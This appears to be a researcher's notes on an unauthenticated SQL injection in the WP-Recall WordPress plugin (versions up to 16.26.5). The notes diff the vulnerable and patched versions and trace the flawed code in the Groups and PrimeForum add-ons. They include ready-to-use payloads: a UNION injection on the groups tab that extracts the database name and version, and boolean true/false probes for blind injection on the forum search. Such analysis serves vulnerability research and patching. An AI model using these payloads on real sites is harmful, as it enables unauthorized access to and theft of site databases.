WP-Recall – Registration, Profile, Commerce & More <= 16.26.5 - Unauthenticated SQL Injection https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recall/wp-recall-registration-profile-commerce-more-16265-unauthenticated-sql-injection
Build wordpress: docker-compose -f stack.yml up
Diff wp-recall.16.26.5 vs wp-recall.16.26.6
-
File: wp-recall\add-on\groups\classes\class-rcl-groups-list.php (Add-on Groups)
-
File: wp-recall\add-on\prime-forum\classes\class-prime-query.php (Add-on PrimeForum)
-
File: wp-recall\add-on\rating-system\core.php (Add on Rating System)
Note: After install wp-recall Default Config
- Add-on Groups default: Inactive
- Add-on PrimeForum default: Inactive
- Add-on Rating System default: Active
Step 1 File: wp-recall\add-on\groups\classes\class-rcl-groups-list.php
Step 2: Search Initialize the object with class Rcl_Groups_List with keyword "new Rcl_Groups_List("
- File: add-on\groups\shortcodes.php
Step 3: Search for functions that call the function rcl_get_grouplist
- File: add-on\groups\index.php
Payload: <Host>/account/?user=1&tab=groups&group-name=p'+or+'%'='%'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat("Database:",database(),0x7c,"Version:",version()),13--+-
Step 1 File: wp-recall\add-on\prime-forum\classes\class-prime-query.php => function setup_child_items()
Step 2: Search Initialize the object with class PrimeQuery with keyword "new PrimeQuery("
-
File: add-on\prime-forum\index.php
-
File: wp-recall\add-on\prime-forum\classes\class-prime-query.php
Payload condition true: /forum/?fs=.%'+or+if(1=1,'%',1)='
Payload condition false: /forum/?fs=.%'+or+if(1=2,'%',1)='
